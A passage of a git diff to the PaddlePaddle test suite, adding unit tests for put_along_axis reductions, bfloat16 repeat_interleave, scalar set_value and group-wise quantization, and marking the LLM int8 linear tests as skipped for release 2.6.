+        self.index = np.zeros((5, 5, 5)).astype(self.index_type)
+        self.axis = 1
+        self.axis_type = "int64"
+
+
+class TestPutAlongAxisOpMeanNotIncludeSelf(TestPutAlongAxisOp):
+    def setUp(self):
+        self.init_data()
+        self.reduce_op = "mean"
+        self.op_type = "put_along_axis"
+        self.python_api = paddle.tensor.put_along_axis
+        self.xnp = np.random.random(self.x_shape).astype(self.x_type)
+        # numpy put_along_axis is an inplace operation.
+        self.target = copy.deepcopy(self.xnp)
+        self.nums = np.zeros_like(self.target)
+        for i in range(5):
+            for j in range(5):
+                for k in range(5):
+                    if self.nums[i, self.index[i, j, k], k] == 0:
+                        self.target[i, self.index[i, j, k], k] = self.value[
+                            i, j, k
+                        ]
+                    else:
+                        self.target[i, self.index[i, j, k], k] += self.value[
+                            i, j, k
+                        ]
+                    self.nums[i, self.index[i, j, k], k] += 1
+        for i in range(10):
+            for j in range(10):
+                for k in range(10):
+                    if self.nums[i, j, k] > 0:
+                        self.target[i, j, k] = (
+                            self.target[i, j, k] / self.nums[i, j, k]
+                        )
+        self.inputs = {
+            'Input': self.xnp,
+            'Index': self.index,
+            'Value': self.value,
+        }
+        self.attrs = {
+            'Axis': self.axis,
+            'Reduce': self.reduce_op,
+            'Include_self': False,
+            'broadcast': False,
+        }
+        self.outputs = {'Result': self.target}
+
+    def init_data(self):
+        self.dtype = 'float64'
+        self.x_type = "float64"
+        self.x_shape = (10, 10, 10)
+        self.value_type = "float64"
+        self.value = np.random.randint(1, 5, (5, 5, 5)).astype(self.value_type)
+        self.index_type = "int64"
+        self.index = np.zeros((5, 5, 5)).astype(self.index_type)
+        self.axis = 1
+        self.axis_type = "int64"
+
+
+class TestPutAlongAxisOpMin(TestPutAlongAxisOp):
+    def setUp(self):
+        self.init_data()
+        self.reduce_op = "amin"
+        self.op_type = "put_along_axis"
+        self.python_api = paddle.tensor.put_along_axis
+        self.xnp = np.random.random(self.x_shape).astype(self.x_type)
+        # numpy put_along_axis is an inplace operation.
+        self.target = copy.deepcopy(self.xnp)
+        for i in range(5):
+            for j in range(5):
+                for k in range(5):
+                    self.target[i, self.index[i, j, k], k] = (
+                        self.value[i, j, k]
+                        if self.value[i, j, k]
+                        < self.target[i, self.index[i, j, k], k]
+                        else self.target[i, self.index[i, j, k], k]
+                    )
+        self.inputs = {
+            'Input': self.xnp,
+            'Index': self.index,
+            'Value': self.value,
+        }
+        self.attrs = {
+            'Axis': self.axis,
+            'Reduce': self.reduce_op,
+            'include_self': True,
+            'broadcast': False,
+        }
+        self.outputs = {'Result': self.target}
+
+    def init_data(self):
+        self.dtype = 'float64'
+        self.x_type = "float64"
+        self.x_shape = (10, 10, 10)
+        self.value_type = "float64"
+        self.value = (
+            np.arange(1, 126).reshape((5, 5, 5)).astype(self.value_type)
+        )
+        self.index_type = "int64"
+        self.index = np.zeros((5, 5, 5)).astype(self.index_type)
+        self.axis = 1
+        self.axis_type = "int64"
+
+
+class TestPutAlongAxisOpMinNotIncludeSelf(TestPutAlongAxisOp):
+    def setUp(self):
+        self.init_data()
+        self.reduce_op = "amin"
+        self.op_type = "put_along_axis"
+        self.python_api = paddle.tensor.put_along_axis
+        self.xnp = np.random.random(self.x_shape).astype(self.x_type)
+        # numpy put_along_axis is an inplace operation.
+        self.target = copy.deepcopy(self.xnp)
+        for i in range(5):
+            for j in range(5):
+                for k in range(5):
+                    self.target[i, self.index[i, j, k], k] = self.value[i, j, k]
+        for i in range(5):
+            for j in range(5):
+                for k in range(5):
+                    self.target[i, self.index[i, j, k], k] = (
+                        self.value[i, j, k]
+                        if self.value[i, j, k]
+                        < self.target[i, self.index[i, j, k], k]
+                        else self.target[i, self.index[i, j, k], k]
+                    )
+        self.inputs = {
+            'Input': self.xnp,
+            'Index': self.index,
+            'Value': self.value,
+        }
+        self.attrs = {
+            'Axis': self.axis,
+            'Reduce': self.reduce_op,
+            'Include_self': False,
+            'broadcast': False,
+        }
+        self.outputs = {'Result': self.target}
+
+    def init_data(self):
+        self.dtype = 'float64'
+        self.x_type = "float64"
+        self.x_shape = (10, 10, 10)
+        self.value_type = "float64"
+        self.value = (
+            np.arange(1, 126).reshape((5, 5, 5)).astype(self.value_type)
+        )
+        self.index_type = "int64"
+        self.index = np.zeros((5, 5, 5)).astype(self.index_type)
+        self.axis = 1
+        self.axis_type = "int64"
+
+
+class TestPutAlongAxisOpMax(TestPutAlongAxisOp):
+    def setUp(self):
+        self.init_data()
+        self.reduce_op = "amax"
+        self.op_type = "put_along_axis"
+        self.python_api = paddle.tensor.put_along_axis
+        self.xnp = np.random.random(self.x_shape).astype(self.x_type)
+        # numpy put_along_axis is an inplace operation.
+        self.target = copy.deepcopy(self.xnp)
+        for i in range(5):
+            for j in range(5):
+                for k in range(5):
+                    self.target[i, self.index[i, j, k], k] = (
+                        self.value[i, j, k]
+                        if self.value[i, j, k]
+                        > self.target[i, self.index[i, j, k], k]
+                        else self.target[i, self.index[i, j, k], k]
+                    )
+        self.inputs = {
+            'Input': self.xnp,
+            'Index': self.index,
+            'Value': self.value,
+        }
+        self.attrs = {
+            'Axis': self.axis,
+            'Reduce': self.reduce_op,
+            'include_self': True,
+            'broadcast': False,
+        }
+        self.outputs = {'Result': self.target}
+
+    def init_data(self):
+        self.dtype = 'float64'
+        self.x_type = "float64"
+        self.x_shape = (10, 10, 10)
+        self.value_type = "float64"
+        self.value = (
+            np.arange(1, 126).reshape((5, 5, 5)).astype(self.value_type)
+        )
+        self.index_type = "int64"
+        self.index = np.zeros((5, 5, 5)).astype(self.index_type)
+        self.axis = 1
+        self.axis_type = "int64"
+
+
+class TestPutAlongAxisOpMaxNotIncludeSelf(TestPutAlongAxisOp):
+    def setUp(self):
+        self.init_data()
+        self.reduce_op = "amax"
+        self.op_type = "put_along_axis"
+        self.python_api = paddle.tensor.put_along_axis
+        self.xnp = np.random.random(self.x_shape).astype(self.x_type)
+        # numpy put_along_axis is an inplace operation.
+        self.target = copy.deepcopy(self.xnp)
+        for i in range(5):
+            for j in range(5):
+                for k in range(5):
+                    self.target[i, self.index[i, j, k], k] = self.value[i, j, k]
+        for i in range(5):
+            for j in range(5):
+                for k in range(5):
+                    self.target[i, self.index[i, j, k], k] = (
+                        self.value[i, j, k]
+                        if self.value[i, j, k]
+                        > self.target[i, self.index[i, j, k], k]
+                        else self.target[i, self.index[i, j, k], k]
+                    )
+        self.inputs = {
+            'Input': self.xnp,
+            'Index': self.index,
+            'Value': self.value,
+        }
+        self.attrs = {
+            'Axis': self.axis,
+            'Reduce': self.reduce_op,
+            'Include_self': False,
+            'broadcast': False,
+        }
+        self.outputs = {'Result': self.target}
+
+    def init_data(self):
+        self.dtype = 'float64'
+        self.x_type = "float64"
+        self.x_shape = (10, 10, 10)
+        self.value_type = "float64"
+        self.value = (
+            np.arange(1, 126).reshape((5, 5, 5)).astype(self.value_type)
+        )
+        self.index_type = "int64"
+        self.index = np.zeros((5, 5, 5)).astype(self.index_type)
+        self.axis = 1
+        self.axis_type = "int64"
+
+
 @unittest.skipIf(
     not core.is_compiled_with_cuda()
     or not core.is_bfloat16_supported(core.CUDAPlace(0)),
@@ -274,6 +738,45 @@ def run(place):
             run(place)
 
 
+@unittest.skipIf(
+    not core.is_compiled_with_cuda(),
+    "core is not complied with CUDA",
+)
+class TestPutAlongAxisAPILargeCase(unittest.TestCase):
+    def setUp(self):
+        np.random.seed(0)
+        self.shape = [64, 1327104]
+        self.index_shape = [64, 1327104]
+        self.index_np = np.zeros(self.index_shape).astype('int64')
+        self.x_np = np.random.random(self.shape).astype(np.float32)
+        self.axis = 1
+        self.value_np = np.ones(self.index_shape).astype(np.float32)
+        self.x_feed = copy.deepcopy(self.x_np)
+        self.place = [paddle.CUDAPlace(0)]
+
+    def test_api_dygraph(self):
+        def run(place):
+            paddle.disable_static(place)
+            x_tensor = paddle.to_tensor(self.x_np)
+            index_tensor = paddle.to_tensor(self.index_np)
+            value_tensor = paddle.to_tensor(self.value_np)
+            out = paddle.put_along_axis(
+                x_tensor, index_tensor, value_tensor, self.axis
+            )
+            np.array(
+                np.put_along_axis(
+                    self.x_np, self.index_np, self.value_np, self.axis
+                )
+            )
+            out_ref = self.x_np
+            np.testing.assert_allclose(out.numpy(), out_ref, rtol=0.001)
+
+            paddle.enable_static()
+
+        for place in self.place:
+            run(place)
+
+
 class TestPutAlongAxisAPICase2(TestPutAlongAxisAPI):
     def setUp(self):
         np.random.seed(0)
@@ -468,13 +971,262 @@ def test_error(self):
         except Exception as error:
             self.assertIsInstance(error, RuntimeError)
 
-        # use includ_self=False
-        try:
+    def test_index_type_error(self):
+        tensorx = paddle.to_tensor([[1, 2, 3], [4, 5, 6]]).astype("float32")
+        indices = paddle.to_tensor([[1]]).astype("float32")
+        values = paddle.to_tensor([[2]])
+        with self.assertRaises(TypeError):
             res = paddle.put_along_axis(
-                tensorx, indices, 1.0, 0, 'assign', False
+                tensorx, indices, values, 0, 'mul', True, False
             )
-        except Exception as error:
-            self.assertIsInstance(error, ValueError)
+
+
+@unittest.skipIf(
+    not core.is_compiled_with_cuda(),
+    "core is not complied with CUDA",
+)
+class TestPutAlongAxisAPIMulFloat32(unittest.TestCase):
+    def setUp(self):
+        np.random.seed(0)
+        self.dtype = 'float32'
+        self.x_type = "float32"
+        self.x_shape = (10, 10, 10)
+        self.value_type = "float32"
+        self.value = np.random.randint(1, 5, (5, 5, 5)).astype(self.value_type)
+        self.index_type = "int64"
+        self.index = np.random.randint(0, 5, (5, 5, 5)).astype(self.index_type)
+        self.axis = 1
+        self.axis_type = "int64"
+        self.op_type = "put_along_axis"
+        self.python_api = paddle.tensor.put_along_axis
+        self.xnp = np.random.random(self.x_shape).astype(self.x_type)
+        # numpy put_along_axis is an inplace operation.
+        self.target = copy.deepcopy(self.xnp)
+        for i in range(5):
+            for j in range(5):
+                for k in range(5):
+                    self.target[i, self.index[i, j, k], k] *= self.value[
+                        i, j, k
+                    ]
+
+    def test_api_dygraph(self):
+        def run(place):
+            paddle.disable_static(place)
+            x_tensor = paddle.to_tensor(self.xnp)
+            index_tensor = paddle.to_tensor(self.index)
+            value_tensor = paddle.to_tensor(self.value)
+            out = paddle.put_along_axis(
+                x_tensor,
+                index_tensor,
+                value_tensor,
+                self.axis,
+                "mul",
+                True,
+                False,
+            )
+            out_ref = self.target
+            np.testing.assert_allclose(out.numpy(), out_ref, rtol=0.001)
+
+        run(paddle.CUDAPlace(0))
+
+
+@unittest.skipIf(
+    not core.is_compiled_with_cuda()
+    or not core.is_bfloat16_supported(core.CUDAPlace(0)),
+    "core is not complied with CUDA and not support the bfloat16",
+)
+class TestPutAlongAxisAPIMulBF16(unittest.TestCase):
+    def setUp(self):
+        np.random.seed(0)
+        self.dtype = 'float32'
+        self.x_type = "float32"
+        self.x_shape = (10, 10, 10)
+        self.value_type = "float32"
+        self.value = np.random.randint(1, 3, (3, 3, 3)).astype(self.value_type)
+        self.index_type = "int64"
+        self.index = np.random.randint(0, 3, (3, 3, 3)).astype(self.index_type)
+        self.axis = 1
+        self.axis_type = "int64"
+        self.op_type = "put_along_axis"
+        self.python_api = paddle.tensor.put_along_axis
+        self.xnp = np.random.random(self.x_shape).astype(self.x_type)
+        self.target = copy.deepcopy(self.xnp)
+        for i in range(3):
+            for j in range(3):
+                for k in range(3):
+                    self.target[i, self.index[i, j, k], k] *= self.value[
+                        i, j, k
+                    ]
+        self.xnp = convert_float_to_uint16(self.xnp)
+        self.value = convert_float_to_uint16(self.value)
+        self.target = convert_float_to_uint16(self.target)
+
+    def test_api_dygraph(self):
+        def run(place):
+            paddle.disable_static(place)
+            x_tensor = paddle.to_tensor(self.xnp)
+            index_tensor = paddle.to_tensor(self.index)
+            value_tensor = paddle.to_tensor(self.value)
+            out = paddle.put_along_axis(
+                x_tensor,
+                index_tensor,
+                value_tensor,
+                self.axis,
+                "mul",
+                True,
+                False,
+            )
+            out_ref = self.target
+            np.testing.assert_allclose(out.numpy(), out_ref, rtol=0.001)
+
+        run(paddle.CUDAPlace(0))
+
+
+@unittest.skipIf(
+    not core.is_compiled_with_cuda(),
+    "core is not complied with CUDA",
+)
+class TestPutAlongAxisAPIMulInt32(unittest.TestCase):
+    def setUp(self):
+        np.random.seed(0)
+        self.dtype = 'int32'
+        self.x_type = "int32"
+        self.x_shape = (10, 10, 10)
+        self.value_type = "int32"
+        self.value = np.random.randint(1, 5, (5, 5, 5)).astype(self.value_type)
+        self.index_type = "int32"
+        self.index = np.zeros((5, 5, 5)).astype(self.index_type)
+        self.axis = 1
+        self.axis_type = "int64"
+        self.op_type = "put_along_axis"
+        self.python_api = paddle.tensor.put_along_axis
+        self.xnp = np.random.randint(1, 5, self.x_shape).astype(self.x_type)
+        # numpy put_along_axis is an inplace operation.
+        self.target = copy.deepcopy(self.xnp)
+        for i in range(5):
+            for j in range(5):
+                for k in range(5):
+                    self.target[i, self.index[i, j, k], k] *= self.value[
+                        i, j, k
+                    ]
+
+    def test_api_dygraph(self):
+        def run(place):
+            paddle.disable_static(place)
+            x_tensor = paddle.to_tensor(self.xnp)
+            index_tensor = paddle.to_tensor(self.index)
+            value_tensor = paddle.to_tensor(self.value)
+            out = paddle.put_along_axis(
+                x_tensor,
+                index_tensor,
+                value_tensor,
+                self.axis,
+                "mul",
+                True,
+                False,
+            )
+            out_ref = self.target
+            np.testing.assert_allclose(out.numpy(), out_ref, rtol=0.001)
+
+        run(paddle.CUDAPlace(0))
+
+
+@unittest.skipIf(
+    not core.is_compiled_with_cuda(),
+    "core is not complied with CUDA",
+)
+class TestPutAlongAxisAPIMulInt64(unittest.TestCase):
+    def setUp(self):
+        np.random.seed(0)
+        self.dtype = 'int64'
+        self.x_type = "int64"
+        self.x_shape = (10, 10, 10)
+        self.value_type = "int64"
+        self.value = np.random.randint(1, 5, (5, 5, 5)).astype(self.value_type)
+        self.index_type = "int64"
+        self.index = np.zeros((5, 5, 5)).astype(self.index_type)
+        self.axis = 1
+        self.axis_type = "int64"
+        self.op_type = "put_along_axis"
+        self.python_api = paddle.tensor.put_along_axis
+        self.xnp = np.random.randint(1, 5, self.x_shape).astype(self.x_type)
+        # numpy put_along_axis is an inplace operation.
+        self.target = copy.deepcopy(self.xnp)
+        for i in range(5):
+            for j in range(5):
+                for k in range(5):
+                    self.target[i, self.index[i, j, k], k] *= self.value[
+                        i, j, k
+                    ]
+
+    def test_api_dygraph(self):
+        def run(place):
+            paddle.disable_static(place)
+            x_tensor = paddle.to_tensor(self.xnp)
+            index_tensor = paddle.to_tensor(self.index)
+            value_tensor = paddle.to_tensor(self.value)
+            out = paddle.put_along_axis(
+                x_tensor,
+                index_tensor,
+                value_tensor,
+                self.axis,
+                "mul",
+                True,
+                False,
+            )
+            out_ref = self.target
+            np.testing.assert_allclose(out.numpy(), out_ref, rtol=0.001)
+
+        run(paddle.CUDAPlace(0))
+
+
+@unittest.skipIf(
+    not core.is_compiled_with_cuda(),
+    "core is not complied with CUDA",
+)
+class TestPutAlongAxisAPIMulUint8(unittest.TestCase):
+    def setUp(self):
+        np.random.seed(0)
+        self.dtype = 'uint8'
+        self.x_type = "uint8"
+        self.x_shape = (10, 10, 10)
+        self.value_type = "uint8"
+        self.value = np.random.randint(1, 5, (5, 5, 5)).astype(self.value_type)
+        self.index_type = "int64"
+        self.index = np.zeros((5, 5, 5)).astype(self.index_type)
+        self.axis = 1
+        self.axis_type = "int64"
+        self.op_type = "put_along_axis"
+        self.python_api = paddle.tensor.put_along_axis
+        self.xnp = np.random.randint(1, 5, self.x_shape).astype(self.x_type)
+        # numpy put_along_axis is an inplace operation.
+        self.target = copy.deepcopy(self.xnp)
+        for i in range(5):
+            for j in range(5):
+                for k in range(5):
+                    self.target[i, self.index[i, j, k], k] *= self.value[
+                        i, j, k
+                    ]
+
+    def test_api_dygraph(self):
+        def run(place):
+            paddle.disable_static(place)
+            x_tensor = paddle.to_tensor(self.xnp)
+            index_tensor = paddle.to_tensor(self.index)
+            value_tensor = paddle.to_tensor(self.value)
+            out = paddle.put_along_axis(
+                x_tensor,
+                index_tensor,
+                value_tensor,
+                self.axis,
+                "mul",
+                True,
+                False,
+            )
+            out_ref = self.target
+            np.testing.assert_allclose(out.numpy(), out_ref, rtol=0.001)
+
+        run(paddle.CUDAPlace(0))
 
 
 if __name__ == "__main__":
diff --git a/test/legacy_test/test_repeat_interleave_op.py b/test/legacy_test/test_repeat_interleave_op.py
index b2d0a12c6e260d..60d11a813263e5 100644
--- a/test/legacy_test/test_repeat_interleave_op.py
+++ b/test/legacy_test/test_repeat_interleave_op.py
@@ -252,6 +252,25 @@ def test_dygraph_api(self):
         expect_out = np.repeat(input_x, index, axis=None)
         np.testing.assert_allclose(expect_out, np_z, rtol=1e-05)
 
+        # case input dtype is bfloat16
+        input_x = np.array([[1, 2, 1], [1, 2, 3]]).astype('uint16')
+
+        with base.dygraph.guard():
+            x = paddle.to_tensor(input_x)
+            index = paddle.to_tensor(index_x)
+            z = paddle.repeat_interleave(x, index, None)
+            np_z = z.numpy()
+        expect_out = np.repeat(input_x, index_x, axis=None)
+        np.testing.assert_allclose(expect_out, np_z, rtol=1e-05)
+
+        with base.dygraph.guard():
+            x = paddle.to_tensor(input_x)
+            index = 2
+            z = paddle.repeat_interleave(x, index, None)
+            np_z = z.numpy()
+        expect_out = np.repeat(input_x, index, axis=None)
+        np.testing.assert_allclose(expect_out, np_z, rtol=1e-05)
+
         # case 1:
         with base.dygraph.guard():
             x = base.dygraph.to_variable(self.data_x)
diff --git a/test/legacy_test/test_set_value_op.py b/test/legacy_test/test_set_value_op.py
index 65c9f69765d116..c42026fb9caee1 100644
--- a/test/legacy_test/test_set_value_op.py
+++ b/test/legacy_test/test_set_value_op.py
@@ -1978,5 +1978,87 @@ def test_check_grad(self):
         self.check_grad_with_place(place, ['Input'], 'Out', check_dygraph=False)
 
 
+class TestSetValueWithScalarInStatic(unittest.TestCase):
+    def setUp(self):
+        paddle.enable_static()
+        self.shape = (10, 2)
+        self.exe = paddle.static.Executor()
+        self.train_program = paddle.static.Program()
+        self.startup_program = paddle.static.Program()
+
+    def test_value_input_is_scalar(self):
+        with paddle.static.program_guard(
+            self.train_program, self.startup_program
+        ):
+            x = paddle.ones(self.shape)
+            x.stop_gradient = False
+            y = x * 1
+
+            # mock test case x[0, 0] = 10 with no ValueTensor input
+            inputs = {
+                'Input': y,
+            }
+            attrs = {
+                'axes': [0, 1],
+                'starts': [0, 0],
+                'ends': [1, 1],
+                'steps': [1, 1],
+                'values': [10],
+                'shape': [1],
+            }
+
+            helper = LayerHelper("set_value")
+            out = helper.create_variable_for_type_inference(dtype=y.dtype)
+
+            helper.append_op(
+                type="set_value",
+                inputs=inputs,
+                outputs={'Out': out},
+                attrs=attrs,
+            )
+
+            np_data = np.ones(self.shape).astype('float32')
+
+            paddle.static.append_backward(out.sum())
+            res = self.exe.run(
+                self.train_program, fetch_list=[out, x.grad_name]
+            )
+
+            np_data[0, 0] = 10
+            expected_x_grad = np.ones(self.shape)
+            expected_x_grad[0, 0] = 0
+
+        np.testing.assert_array_equal(res[0], np_data)
+        np.testing.assert_array_equal(res[1], expected_x_grad)
+
+
+class TestSetValueWithScalarInDygraph(unittest.TestCase):
+    def setUp(self):
+        paddle.disable_static()
+        self.shape = (10, 2)
+
+    def test_value_input_is_scalar(self):
+        x = paddle.ones(self.shape)
+        x.stop_gradient = False
+        y = x * 1
+
+        # mock test case x[0, 0] = 10 with no ValueTensor input
+        out = paddle._C_ops.set_value(
+            y, [0, 0], [1, 1], [1, 1], [0, 1], [], [], [1], [10.0]
+        )
+
+        loss = out.sum()
+        loss.backward()
+
+        np_data = np.ones(self.shape).astype('float32')
+        np_data[0, 0] = 10
+
+        expected_x_grad = np.ones(self.shape)
+        expected_x_grad[0, 0] = 0
+
+        np.testing.assert_array_equal(out, np_data)
+        np.testing.assert_array_equal(x.grad, expected_x_grad)
+
+
 if __name__ == '__main__':
     unittest.main()
diff --git a/test/legacy_test/test_sparse_fused_attention_op.py b/test/legacy_test/test_sparse_fused_attention_op.py
index 68cdd16d4bd12c..098f4815b85f38 100644
--- a/test/legacy_test/test_sparse_fused_attention_op.py
+++ b/test/legacy_test/test_sparse_fused_attention_op.py
@@ -42,6 +42,7 @@ def get_cuda_version():
 )
 class TestSparseAttentionAPI1(unittest.TestCase):
     def setUp(self):
+        paddle.seed(0)
         self.batch_size = 16
         self.num_heads = 16
         self.seq_len = 128
@@ -134,6 +135,7 @@ def test_dygraph(self):
 
 class TestSparseAttentionAPI2(TestSparseAttentionAPI1):
     def setUp(self):
+        super().setUp()
         self.batch_size = 16
         self.num_heads = 16
         self.seq_len = 128
@@ -144,6 +146,7 @@ def setUp(self):
 
 class TestSparseAttentionAPI3(TestSparseAttentionAPI1):
     def setUp(self):
+        super().setUp()
         self.batch_size = 16
         self.num_heads = 16
         self.seq_len = 512
@@ -154,6 +157,7 @@ def setUp(self):
 
 class TestSparseAttentionAPI4(TestSparseAttentionAPI1):
     def setUp(self):
+        super().setUp()
         self.batch_size = 16
         self.num_heads = 16
         self.seq_len = 512
@@ -164,6 +168,7 @@ def setUp(self):
 
 class TestSparseAttentionAPI5(TestSparseAttentionAPI1):
     def setUp(self):
+        super().setUp()
         self.batch_size = 16
         self.num_heads = 16
         self.seq_len = 512
diff --git a/test/quantization/test_groupwise.py b/test/quantization/test_groupwise.py
new file mode 100644
index 00000000000000..aef864fd2713bd
--- /dev/null
+++ b/test/quantization/test_groupwise.py
@@ -0,0 +1,69 @@
+# copyright (c) 2023 paddlepaddle authors. all rights reserved.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#     http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+import os
+import tempfile
+import unittest
+
+import paddle
+from paddle.nn import Linear, Sequential
+from paddle.quantization import PTQ, QuantConfig
+from paddle.quantization.observers import GroupWiseWeightObserver
+
+
+class LinearDygraph(paddle.nn.Layer):
+    def __init__(self):
+        super().__init__()
+        self.fc = Sequential(
+            Linear(128, 128), Linear(128, 128), Linear(128, 128)
+        )
+
+    def forward(self, inputs):
+        out = self.fc(inputs)
+        return out
+
+
+class TestPTQGroupWise(unittest.TestCase):
+    def setUp(self):
+        self.temp_dir = tempfile.TemporaryDirectory()
+        self.path = os.path.join(self.temp_dir.name, 'ptq')
+
+    def tearDown(self):
+        self.temp_dir.cleanup()
+
+    def _get_model_for_ptq(self):
+        observer = GroupWiseWeightObserver(quant_bits=4, group_size=128)
+        model = LinearDygraph()
+        model.eval()
+        q_config = QuantConfig(activation=None, weight=observer)
+        ptq = PTQ(q_config)
+        quant_model = ptq.quantize(model)
+        return quant_model, ptq
+
+    def _count_layers(self, model, layer_type):
+        count = 0
+        for _layer in model.sublayers(True):
+            if isinstance(_layer, layer_type):
+                count += 1
+        return count
+
+    def test_quantize(self):
+        ptq_model, _ = self._get_model_for_ptq()
+        inputs = paddle.rand([128, 128], dtype="float32")
+        out = ptq_model(inputs)
+        self.assertIsNotNone(out)
+
+
+if __name__ == '__main__':
+    unittest.main()
diff --git a/test/quantization/test_llm_int8_linear.py b/test/quantization/test_llm_int8_linear.py
index 5a35b0d5124616..e4920f198f2c6f 100644
--- a/test/quantization/test_llm_int8_linear.py
+++ b/test/quantization/test_llm_int8_linear.py
@@ -15,12 +15,11 @@
 import unittest
 
 import numpy as np
-from test_weight_only_linear import convert_uint16_to_float, get_cuda_version
+from test_weight_only_linear import convert_uint16_to_float
 
 import paddle
 import paddle.nn.quant as Q
 from paddle import base
-from paddle.base import core
 from paddle.base.framework import default_main_program
 from paddle.framework import set_default_dtype
 from paddle.pir_utils import test_with_pir_api
@@ -30,12 +29,7 @@
 default_main_program().random_seed = 42
 
 
-@unittest.skipIf(
-    not core.is_compiled_with_cuda()
-    or get_cuda_version() < 11020
-    or paddle.device.cuda.get_device_capability()[0] < 8,
-    "quantized_matmul requires CUDA >= 11.2 and CUDA_ARCH >= 8",
-)
+@unittest.skipIf(True, "Disable this unit test in release/2.6")
 class LLMInt8LinearTestCase(unittest.TestCase):
     def config(self):
         self.dtype = 'float16'
@@ -149,12 +143,7 @@ def test_llm_int8_linear(self):
         )
 
 
-@unittest.skipIf(
-    not core.is_compiled_with_cuda()
-    or get_cuda_version() < 11020
-    or paddle.device.cuda.get_device_capability()[0] < 8,
-    "quantized_matmul requires CUDA >= 11.2 and CUDA_ARCH >= 8",
-)
+@unittest.skipIf(True, "Disable this unit test in release/2.6")
 class LLMInt8LinearTestCase1(LLMInt8LinearTestCase):
     def config(self):
         super().config()
@@ -162,12 +151,7 @@ def config(self):
         self.weight_dtype = "int8"
 
 
-@unittest.skipIf(
-    not core.is_compiled_with_cuda()
-    or get_cuda_version() < 11020
-    or paddle.device.cuda.get_device_capability()[0] < 8,
-    "quantized_matmul requires CUDA >= 11.2 and CUDA_ARCH >= 8",
-)
+@unittest.skipIf(True, "Disable this unit test in release/2.6")
 class LLMInt8LinearTestCase2(LLMInt8LinearTestCase):
     def config(self):
         super().config()
@@ -176,12 +160,7 @@ def config(self):
         self.weight_dtype = "int8"
 
 
-@unittest.skipIf(
-    not core.is_compiled_with_cuda()
-    or get_cuda_version() < 11020
-    or paddle.device.cuda.get_device_capability()[0] < 8,
-    "quantized_matmul requires CUDA >= 11.2 and CUDA_ARCH >= 8",
-)
+@unittest.skipIf(True, "Disable this unit test in release/2.6")
 class LLMInt8LinearTestCase3(LLMInt8LinearTestCase):
     def config(self):
         super().config()
@@ -189,13 +168,7 @@ def config(self):
         self.weight_dtype = "int8"
 
 
-@unittest.skipIf(
-    not core.is_compiled_with_cuda()
-    or get_cuda_version() < 11020
-    or paddle.device.cuda.get_device_capability()[0] < 8
-    or not core.is_bfloat16_supported(core.CUDAPlace(0)),
-    "quantized_matmul requires CUDA >= 11.2 and CUDA_ARCH >= 8 or core is not support bfloat16",
-)
+@unittest.skipIf(True, "Disable this unit test in release/2.6")
 class LLMInt8LinearTestCase4(LLMInt8LinearTestCase):
     def config(self):
         super().config()
@@ -203,12 +176,7 @@ def config(self):
         self.weight_dtype = "int4"
 
 
-@unittest.skipIf(
-    not core.is_compiled_with_cuda()
-    or get_cuda_version() < 11020
-    or paddle.device.cuda.get_device_capability()[0] < 8,
-    "quantized_matmul requires CUDA >= 11.2 and CUDA_ARCH >= 8",
-)
+@unittest.skipIf(True, "Disable this unit test in release/2.6")
 class LLMInt8LinearTestCase5(LLMInt8LinearTestCase):
     def config(self):
         super().config()
@@ -217,13 +185,7 @@ def config(self):
         self.weight_dtype = "int4"
 
 
-@unittest.skipIf(
-    not core.is_compiled_with_cuda()
-    or get_cuda_version() < 11020
-    or paddle.device.cuda.get_device_capability()[0] < 8
-    or not core.is_bfloat16_supported(core.CUDAPlace(0)),
-    "quantized_matmul requires CUDA >= 11.2 and CUDA_ARCH >= 8 or core is not support bfloat16",
-)
+@unittest.skipIf(True, "Disable this unit test in release/2.6")
 class LLMInt8LinearTestCase6(LLMInt8LinearTestCase):
     def config(self):
         super().config()
@@ -231,12 +193,7 @@ def config(self):
         self.weight_dtype = "int4"
 
 
-@unittest.skipIf(
-    not core.is_compiled_with_cuda()
-    or get_cuda_version() < 11020
-    or paddle.device.cuda.get_device_capability()[0] < 8,
-    "quantized_matmul requires CUDA >= 11.2 and CUDA_ARCH >= 8",
-)
+@unittest.skipIf(True, "Disable this unit test in release/2.6")
 class LLMInt8LinearTestCase7(LLMInt8LinearTestCase):
     def config(self):
         super().config()
@@ -246,12 +203,7 @@ def config(self):
         self.token = 1
 
 
-@unittest.skipIf(
-    not core.is_compiled_with_cuda()
-    or get_cuda_version() < 11020
-    or paddle.device.cuda.get_device_capability()[0] < 8,
-    "quantized_matmul requires CUDA >= 11.2 and CUDA_ARCH >= 8",
-)
+@unittest.skipIf(True, "Disable this unit test in release/2.6")
 class LLMInt8LinearTestCase8(LLMInt8LinearTestCase):
     def config(self):
         super().config()
@@ -262,12 +214,7 @@ def config(self):
         self.token = 1
 
 
-@unittest.skipIf(
-    not core.is_compiled_with_cuda()
-    or get_cuda_version() < 11020
-    or paddle.device.cuda.get_device_capability()[0] < 8,
-    "quantized_matmul requires CUDA >= 11.2 and CUDA_ARCH >= 8",
-)
+@unittest.skipIf(True, "Disable this unit test in release/2.6")
 class LLMInt8LinearTestCase9(LLMInt8LinearTestCase):
     def config(self):
         super().config()
@@ -277,12 +224,7 @@ def config(self):
         self.token = 1
 
 
-@unittest.skipIf(
-    not core.is_compiled_with_cuda()
-    or get_cuda_version() < 11020
-    or paddle.device.cuda.get_device_capability()[0] < 8,
-    "quantized_matmul requires CUDA >= 11.2 and CUDA_ARCH >= 8",
-)
+@unittest.skipIf(True, "Disable this unit test in release/2.6")
 class LLMInt8LinearTestCase10(LLMInt8LinearTestCase):
     def config(self):
         super().config()
@@ -293,13 +235,7 @@ def config(self):
         self.token = 1
 
 
-@unittest.skipIf(
-    not core.is_compiled_with_cuda()
-    or not core.is_compiled_with_cuda()
-    or get_cuda_version() < 11020
-    or paddle.device.cuda.get_device_capability()[0] < 8,
-    "quantized_matmul requires CUDA >= 11.2 and CUDA_ARCH >= 8",
-)
+@unittest.skipIf(True, "Disable this unit test in release/2.6")
 class LLMInt8LinearTestCaseStatic(LLMInt8LinearTestCase):
     def config(self):
         super().config()
diff --git a/test/quantization/test_post_training_quantization_mobilenetv1.py b/test/quantization/test_post_training_quantization_mobilenetv1.py
index 4500f61ca13dc6..113b2cb066b915 100644
